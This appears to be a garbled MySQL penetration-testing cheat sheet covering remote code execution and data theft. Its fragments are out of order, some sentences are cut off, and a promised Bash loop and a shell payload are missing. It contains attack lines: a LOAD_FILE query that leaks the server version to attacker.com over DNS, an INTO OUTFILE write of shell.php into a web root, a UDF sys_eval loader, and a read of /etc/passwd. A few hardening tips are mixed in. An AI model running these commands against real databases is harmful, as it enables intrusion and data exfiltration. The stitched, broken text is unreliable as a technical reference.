MySQL HackTricks Verified

If the database host also serves web traffic and you can locate the web root, you can write a payload to achieve Remote Code Execution (RCE).

If secure_file_priv is disabled (empty), an attacker can use the SELECT ... INTO OUTFILE statement.

Remove the FILE and SUPER privileges from standard application users. Ensure application accounts only possess DML permissions (SELECT, INSERT, UPDATE, DELETE) on their specific target databases.

In older, unpatched systems running specific versions of MariaDB and MySQL (around versions 5.1 to 5.5), a critical flaw allows authentication bypass due to a bad cast in the checking function. When a user submits a password, there is a 1-in-256 chance that the memory comparison returns true regardless of whether the password is correct.

SELECT LOAD_FILE(CONCAT('\\\\', version(), '.attacker.com\\test'));

Database exploitation is a critical phase of security assessments. MySQL remains one of the most widely deployed relational database management systems globally, making it a frequent target for penetration testers and red teamers.

All techniques marked with a checkmark have been verified against current exploit code, CVEs from 2025‑2026, and penetration testing reports.

Attackers can chain a UNION‑based injection to extract sensitive files:

In specific older versions of MySQL and MariaDB, a flaw in the password checking protocol allowed users to log in without knowing the password. By flooding the login prompt, the driver would accidentally accept a wrong password hash roughly 1 out of every 256 attempts. You can exploit this via a simple Bash loop:

Exploiting insecure defaults & exposed ports

Bind MySQL exclusively to 127.0.0.1 or internal private subnets via the bind-address directive in my.cnf. Never expose port 3306 directly to the internet.

mysql -u root -h
mysql -u root -p -h # Press Enter when prompted for password

Automated Brute Forcing

variable is empty or misconfigured, attackers can interact with the host OS:

Reading Files: LOAD DATA INFILE '/etc/passwd' INTO TABLE temp_table; to exfiltrate system configuration files.

Writing Shells

CREATE FUNCTION sys_eval RETURNS string SONAME 'udf_sys_exec.so';

Once access is gained (whether via low-privilege or administrative accounts), profiling the database structure and system configuration is vital.

Core Discovery Commands

Run these standard queries to map out the environment:

UNION SELECT 1, '', 3 INTO OUTFILE '/var/www/html/shell.php'; --

4. Database Privilege Escalation and RCE via UDF

After cross‑referencing more than 40 sources – HackTricks mirrors, exploit‑DB entries, CVE databases (2025‑2026), penetration testing walkthroughs, and CTF write‑ups – :
